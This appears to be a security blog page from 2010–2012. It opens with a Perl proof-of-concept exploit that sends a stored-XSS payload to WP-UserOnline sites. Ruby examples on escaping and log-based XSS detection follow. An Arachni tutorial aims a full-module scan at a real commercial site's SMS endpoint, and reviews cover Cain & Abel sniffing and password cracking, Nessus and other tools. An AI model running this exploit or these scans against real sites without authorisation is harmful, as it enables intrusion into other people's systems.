#!/usr/bin/perl
# Exploit for WP-UserOnline
# Copyright (C) MustLive 2010
# http://websecurity.com.ua
# Last update: 26.04.2010
##################################################
# Settings
##################################################
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # User Agent
my $url = "http://site"; # URL
my $xss = "/?<script>alert(document.cookie)</script>"; # XSS
##################################################
use IO::Socket;
my ($host,$sock,$content,$response);
# Take the host name from the URL; stop at the first slash so a trailing path is not included
$url =~ /http:\/\/([^\/]+)/;
$host = $1;
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80");
if (!$sock) {
    print "The Socket: $!\n";
    exit();
}
# Send the request with the payload in the path and read the whole response
print $sock "GET $xss HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: $agent\n";
print $sock "Connection: close\n";
print $sock "\n\n";
while (<$sock>) {
    $content .= $_;
}
print "$url - ";
# Pull the status code out of the status line
if ($content =~ /HTTP\/.\..\s+(\d+)/) {
    $response = $1;
}
if ($response == 200 or $response == 400) {
    print "OK\n";
}
else {
    print "Error: $response\n";
}
Tuesday, December 25, 2012
Persistent XSS vulnerability in WP-UserOnline
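The script above puts HTML in the request path and only checks that the server accepted it; the persistent part of the bug is the page that later shows that stored path to other visitors without escaping it. The following Ruby is an added example, not code from the post or from the WP-UserOnline plugin: it assumes (as the exploit's use of the request path suggests) that a plugin stores each visitor's request URI and renders it into HTML, and shows the unescaped rendering pattern beside the escaped one. The Visitor struct and the sample records are constructed for the example.

```ruby
require 'cgi'

# Constructed stand-in for one stored visitor record: the address and the
# request URI exactly as the client sent them (assumption about the plugin).
Visitor = Struct.new(:ip, :request_uri)

# Vulnerable pattern: the stored URI is dropped straight into the HTML, so
# markup that arrived in a request path is rendered, and runs, for every
# viewer of the page. Kept only to contrast with the escaped version below.
def render_online_list_unsafe(visitors)
  visitors.map { |v| "<li>#{v.ip} viewing #{v.request_uri}</li>" }.join("\n")
end

# Hardened pattern: escape at output time. CGI.escapeHTML converts < > & " '
# so the URI is displayed as text, whatever was stored.
def render_online_list_safe(visitors)
  visitors.map do |v|
    "<li>#{CGI.escapeHTML(v.ip)} viewing #{CGI.escapeHTML(v.request_uri)}</li>"
  end.join("\n")
end

# Constructed sample records, including the request path the script above sends.
SAMPLE_VISITORS = [
  Visitor.new("203.0.113.7", "/?<script>alert(document.cookie)</script>"),
  Visitor.new("198.51.100.4", "/about/"),
].freeze

if $PROGRAM_NAME == __FILE__
  puts render_online_list_unsafe(SAMPLE_VISITORS)
  puts
  puts render_online_list_safe(SAMPLE_VISITORS)
end
```

Escaping belongs at the point where the value is written into a page, not at storage time: the stored URI is still useful as data (logs, statistics), and a value escaped for HTML would be wrong in any other context.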
Wednesday, January 18, 2012
How to use Arachni Framework
http://arachni.segfault.gr/latest
The first thing you will need is Cygwin; get it here. After it is installed, download Arachni, run the self-extracting archive and extract it to a folder of your choice. When it's done extracting, open the Cygwin.bat file. Now we can create a simple Ruby file to include the Arachni framework and start auditing a web page. Type notepad text.rb and Notepad will ask if you want to create the file; click Yes. This is where we will use the Arachni framework.
Include the header for the CLI output and arachni itself
require 'arachni/ui/cli/output'
require 'arachni'
Turn off verbose output
Arachni::UI::Output.mute!
Get some options from the framework
opts = Arachni::Options.instance
Specify that we want to audit HTML forms
opts.audit_forms = true
Now specify the URL (seed)
opts.url = 'http://testfire.net/'
If we only want to scan a single URL we would add this line
opts.restrict_paths << 'http://testfire.net/search.aspx'
New class (new arachni object with our options)
framework = Arachni::Framework.new(opts)
If we want to look for XSS exploits we would use
framework.modules.load(['xss'])
You can load ALL the modules by using an asterisk
framework.modules.load(['*'])
Now run arachni
framework.run
Get the first exploit we see
issue = framework.audit_store.issues.first
Show the exploit we found on screen (CLI output)
puts "#{issue.name} at #{issue.url} in #{issue.elem} input `#{issue.var}` using #{issue.method}."
And here is the code to scan with all the modules against a specific page.
require 'arachni/ui/cli/output'
require 'arachni'
Arachni::UI::Output.mute!
opts = Arachni::Options.instance
opts.audit_forms = true
opts.url = 'http://www.bigcinemas.com/'
opts.restrict_paths << 'http://www.bigcinemas.com/in/sendSMS.asp?mobNum=9762001337'
framework = Arachni::Framework.new( opts )
framework.modules.load(['*'])
framework.run
issue_arr = framework.audit_store.issues
issue_arr.each do |issue|
  puts "#{issue.name} at #{issue.url} in #{issue.elem} input `#{issue.var}` using #{issue.method}.\n"
end
Location:
California, USA
Tuesday, August 9, 2011
Sniffing HTTP with httpry 0.1.6
I was skeptical when I first saw this come across Packetstorm, but I gave it a shot, like most tools that come rifling through there. I believe that if you make a security tool intended for UNIX it had better have a version compatible with Debian, the most popular OS for quick security testing. It is easy to install and ran great the very first time with no problems. I was hesitant before because this kind of task can already be done with tools UNIX already provides, and I am not sure what use this tool has for security when other tools are out there. If the project keeps moving forward it could be a seriously handy tool.
The description says it doesn't handle analysis of the HTTP traffic it has logged; maybe that is something to mess with, or maybe I will make a parser. However, anything logged to files can easily be pulled out with regular expressions. Here are the steps to install httpry 0.1.6 from Packetstorm.
- wget http://packetstorm.igor.onlinedirect.bg/sniffers/httpry-0.1.6.tar.gz
- tar -xvf httpry-0.1.6.tar.gz
- cd httpry-0.1.6
- make
- ./httpry
To stop capturing I simply pressed Ctrl+C; it closed for me and told me how many packets were logged. There is an extensive README file which can help you discover more. I think this is, and will continue to be, a good tool for securing yourself against HTTP infections. Here are some command line switches for reference:
- -b FILE
- -d
- -f FORMAT
- -F
- -h
- -i
- -m METHODS
- -n COUNT
- -o FILE
- -p
- -q
- -r FILE
- -t SECONDS
- -u USER
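Two of the posts on this page meet here: the httpry post leaves the analysis of the logged HTTP traffic to the reader, and the WP-UserOnline post shows an attack that is entirely visible in the request path. The Ruby below is an added example, not part of either post or of httpry: a parser for httpry's tab-separated log lines plus a check that flags outbound requests whose decoded URI carries markup, the pattern the XSS script above would leave in a capture. The field order is an assumption taken from httpry's documented default format (timestamp, source IP, destination IP, direction, method, host, request URI, HTTP version, status code, reason phrase); check it against the -f string you run with. The log lines are constructed, not a real capture.

```ruby
require 'cgi'

# Assumed field order of httpry's default tab-separated output; '>' marks a
# request and '<' a response, and fields that do not apply are logged as "-".
HTTPRY_FIELDS = %i[timestamp src dst direction method host uri version status reason].freeze

# Constructed sample lines in that layout (not a real capture). The third line
# carries the XSS script's request path once URL-encoded; the fourth carries a
# double-encoded payload; the last line is deliberately malformed.
SAMPLE_LOG = <<~LOG
  2011-08-09 14:02:11\t192.168.1.20\t10.0.0.5\t>\tGET\twww.example.com\t/index.php\tHTTP/1.1\t-\t-
  2011-08-09 14:02:11\t10.0.0.5\t192.168.1.20\t<\t-\t-\t-\tHTTP/1.1\t200\tOK
  2011-08-09 14:02:13\t192.168.1.33\t10.0.0.5\t>\tGET\twww.example.com\t/?%3Cscript%3Ealert(document.cookie)%3C/script%3E\tHTTP/1.1\t-\t-
  2011-08-09 14:02:14\t192.168.1.33\t10.0.0.5\t>\tGET\twww.example.com\t/?q=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E\tHTTP/1.1\t-\t-
  2011-08-09 14:02:15\t192.168.1.41\t10.0.0.5\t>\tPOST\twww.example.com\t/wp-login.php\tHTTP/1.1\t-\t-
  this line is not in httpry format
LOG

# One log line -> hash keyed by field name, or nil when the line does not have
# exactly the expected number of tab-separated fields.
def parse_httpry_line(line)
  fields = line.chomp.split("\t", -1)
  return nil unless fields.length == HTTPRY_FIELDS.length
  HTTPRY_FIELDS.zip(fields).to_h
end

def parse_httpry_log(text)
  text.each_line.map { |line| parse_httpry_line(line) }.compact
end

# Decode %xx sequences twice so single- and double-encoded payloads compare the
# same. CGI.unescape is lenient: malformed sequences are left untouched.
def decode_uri(uri)
  CGI.unescape(CGI.unescape(uri))
end

# An opening or closing HTML tag, or a javascript: scheme, in the decoded URI.
MARKUP_PATTERN = /<\s*\/?[a-z][\w-]*|javascript\s*:/i

def suspicious_uri?(uri)
  return false if uri.nil? || uri == "-"
  !!(decode_uri(uri) =~ MARKUP_PATTERN)
end

# Outbound requests whose decoded URI carries markup, with the decoded form
# kept so an analyst sees what the server actually received.
def flag_requests(records)
  records.select { |r| r[:direction] == ">" && suspicious_uri?(r[:uri]) }
         .map { |r| { time: r[:timestamp], src: r[:src], host: r[:host], uri: r[:uri], decoded: decode_uri(r[:uri]) } }
end

# Request count per source address, most active first.
def requests_by_source(records)
  records.select { |r| r[:direction] == ">" }
         .group_by { |r| r[:src] }
         .transform_values(&:size)
         .sort_by { |_, n| -n }
end

if $PROGRAM_NAME == __FILE__
  records = parse_httpry_log(SAMPLE_LOG)
  flag_requests(records).each { |f| puts "#{f[:time]} #{f[:src]} -> #{f[:host]} #{f[:decoded]}" }
  requests_by_source(records).each { |src, n| puts "#{src}: #{n} request(s)" }
end
```

Run it against a real file with `parse_httpry_log(File.read("httpry.log"))`. Decoding before matching is the important step: the raw log line for the third request contains no `<` at all, so a regex over the undecoded text would miss it.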
Tuesday, April 19, 2011
Wireshark 1.4.6
Ever since Wireshark came on the scene it has been adopted as the #1 LAN sniffer for security demonstrations, says me. You don't have to believe all the hype and can go back to your console screen, logging hours at the Page Down key. Wireshark for Windows is the best choice for capturing LAN traffic. Download Wireshark here.
Wireshark is extremely easy to use and even a novice can start capturing data on the network. Wireshark features a very rich system to let you edit and resend packets over the network. You can set it to stop capturing after 'x' amount of packets which can be VERY handy for testing application bugs. You can control the size of capture log files and even use multiple files to log your captures too.
Monday, April 18, 2011
Cain & Abel 4.9.40
Cain & Abel is an old school tool that has finally started updating. I remember using this a while ago when I first started getting into security and more namely, hacking. Cain & Abel as told by the official website is a password recovery tool for Windows. This isn't your ordinary password cracker. Cain & Abel can do so much more and has a whole bunch of features you can find useful for network activities. It's also super easy and quick to install.
Sniffing the Network
Cain & Abel makes it easy to sniff your own network's traffic by performing a "man in the middle" attack. This lets you become a node on the network that relays the information to where it needs to go, allowing you to view the traffic along its way. You can perform trace routes and even view the local workgroups and other connected computers.
Password Tools
The password tools let you import local passwords, such as from MS Outlook user accounts. The password cracker also cracks individual password hashes. You can perform dictionary attacks on the password hashes until it finds one; it is highly threaded, so cracking multiple hashes shouldn't be a problem.
Remote Registry & Shares
Along with viewing the users on your network you can even look into their registry if the remote registry is enabled. You can also view and interact with the local shares on the network. Cain & Abel is a very nice and fast alternative to Windows itself for viewing shares. You can help diagnose problems on the network with this tool, making it a staple in the Windows user's arsenal. You can do most of these via the command line, but this gives a nice clean interface so we aren't scrolling through hundreds if not thousands of console lines and logs.
Sunday, April 17, 2011
Nessus 4.4.1
Nessus is a network scanner that checks for vulnerabilities. You will have to register for an activation code, but it's free. Nessus is famous for its plugins and boasts about them on its website as well. You can find several videos on their website that show instructions for installing and even operating Nessus. You can download it here.
I don't mind registering products that are free. In fact, as a developer I sometimes go out of my way to register products that are free. I suggest you do the same, plus I don't think you have access to the plugins if you don't register it. We are using the Windows version, and that is the only version under review here today.
After installing and registering it will take a long time to download and update their immense plugin library. Why was I not allowed to pick or just get a small minimal set? I thought the process took a long time to download and update and I definitely wasn't expecting it. You can view a full list of the plugins and the latest plugins added on their website. I checked back several minutes later and found that it was only at 26%.
Despite taking forever to "initialize" Nessus has a very nice browser based interface with easy to use controls for scanning entire ranges of addresses. I definitely recommend this product.
Thursday, April 14, 2011
Insect Pro 2
After the lengthy extraction process I poked around in the directories and soon found they packaged Metasploit with it. They didn't stop there either: it was also packaged with Python 2.7, Nmap, Ruby and skipfish. I didn't even install this tool, as I could already see that it was simply an interface for using Metasploit exploits; please correct me if I am wrong.
They also claim to release this tool for free, but you have to make a donation in order to use it. If you complain to them about it they might send you a copy. I DO NOT recommend this tool for use.
